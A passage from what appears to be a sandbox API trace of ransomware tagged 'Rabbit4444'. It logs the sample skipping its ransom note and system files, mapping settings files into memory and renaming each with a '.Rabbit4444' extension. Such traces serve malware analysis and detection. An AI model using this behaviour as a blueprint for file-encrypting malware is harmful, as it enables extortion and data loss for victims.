returned 1 [0058.991] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.991] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.991] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15030169985) returned 1 [0058.991] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=824) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.991] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0058.991] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0058.992] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0058.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.993] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.993] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.993] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15030419732) returned 1 [0058.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.994] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0058.994] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.994] CloseHandle (hObject=0x298) returned 1 [0058.994] CloseHandle (hObject=0x278) returned 1 [0058.994] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms.Rabbit4444") returned 192 [0058.994] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.995] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51ad0e6c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51ad0e6c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22204b03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", cAlternateFileName="CLEA27~1.SET")) returned 1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2=".") returned 1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="..") returned 1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="windows") returned -1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="boot") returned 1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.995] lstrcmpiW (lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.995] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms" | out: lpString1="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms") returned="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms" [0058.995] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.995] lstrlenW (lpString="Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms") returned 64 [0058.995] lstrlenW (lpString="Rabbit4444") returned 10 [0058.995] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.995] lstrlenW (lpString=".dll") returned 4 [0058.995] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.995] lstrlenW (lpString=".lnk") returned 4 [0058.995] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.995] lstrlenW (lpString=".ini") returned 4 [0058.995] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.996] lstrlenW (lpString=".sys") returned 4 [0058.996] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.996] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{73c9c58c-2e01-4f68-b1b9-7a4dd2ef71f7}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.996] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.996] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15030666087) returned 1 [0058.996] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=929) returned 1 [0058.996] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0058.996] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0058.996] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0058.997] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0058.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0058.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0058.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.998] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15030909170) returned 1 [0058.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0058.998] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0058.998] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.999] CloseHandle (hObject=0x298) returned 1 [0058.999] CloseHandle (hObject=0x278) returned 1 [0058.999] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms.Rabbit4444") returned 192 [0058.999] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{73c9c58c-2e01-4f68-b1b9-7a4dd2ef71f7}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{73c9c58c-2e01-4f68-b1b9-7a4dd2ef71f7}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.999] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c02197, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51c02197, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230c53a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", cAlternateFileName="CL6104~1.SET")) returned 1 [0058.999] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2=".") returned 1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="..") returned 1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="windows") returned -1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="boot") returned 1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.000] lstrcmpiW (lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.000] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms" | out: lpString1="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms") returned="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms" [0059.000] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.000] lstrlenW (lpString="Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms") returned 64 [0059.000] lstrlenW (lpString="Rabbit4444") returned 10 [0059.000] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.000] lstrlenW (lpString=".dll") returned 4 [0059.000] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.000] lstrlenW (lpString=".lnk") returned 4 [0059.000] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.000] lstrlenW (lpString=".ini") returned 4 [0059.000] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.000] lstrlenW (lpString=".sys") returned 4 [0059.000] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.000] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7429f4f9-ae58-401a-82ad-723f3c6bddd6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.001] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.001] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15031155420) returned 1 [0059.001] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=979) returned 1 [0059.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0059.001] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0059.001] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.002] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.003] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.004] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15031445422) returned 1 [0059.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0059.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0059.004] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.004] CloseHandle (hObject=0x298) returned 1 [0059.004] CloseHandle (hObject=0x278) returned 1 [0059.004] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms.Rabbit4444") returned 192 [0059.004] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7429f4f9-ae58-401a-82ad-723f3c6bddd6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{7429f4f9-ae58-401a-82ad-723f3c6bddd6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.005] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d596c4, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51d596c4, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x220f9a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x425, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", cAlternateFileName="CL543D~1.SET")) returned 1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2=".") returned 1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="..") returned 1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="windows") returned -1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="boot") returned 1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.005] lstrcmpiW (lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.005] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms" | out: lpString1="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms") returned="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms" [0059.005] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.005] lstrlenW (lpString="Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms") returned 64 [0059.006] lstrlenW (lpString="Rabbit4444") returned 10 [0059.006] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.006] lstrlenW (lpString=".dll") returned 4 [0059.006] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.006] lstrlenW (lpString=".lnk") returned 4 [0059.006] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.006] lstrlenW (lpString=".ini") returned 4 [0059.006] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.006] lstrlenW (lpString=".sys") returned 4 [0059.006] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.006] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{75ac9145-7ec9-4883-82a7-ad3429020aa0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.006] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.006] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15031688280) returned 1 [0059.006] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1061) returned 1 [0059.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0059.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0059.006] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.008] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.009] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.009] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.009] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.010] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15032032114) returned 1 [0059.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0059.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0059.010] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.010] CloseHandle (hObject=0x298) returned 1 [0059.010] CloseHandle (hObject=0x278) returned 1 [0059.010] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms.Rabbit4444") returned 192 [0059.010] MoveFileExW 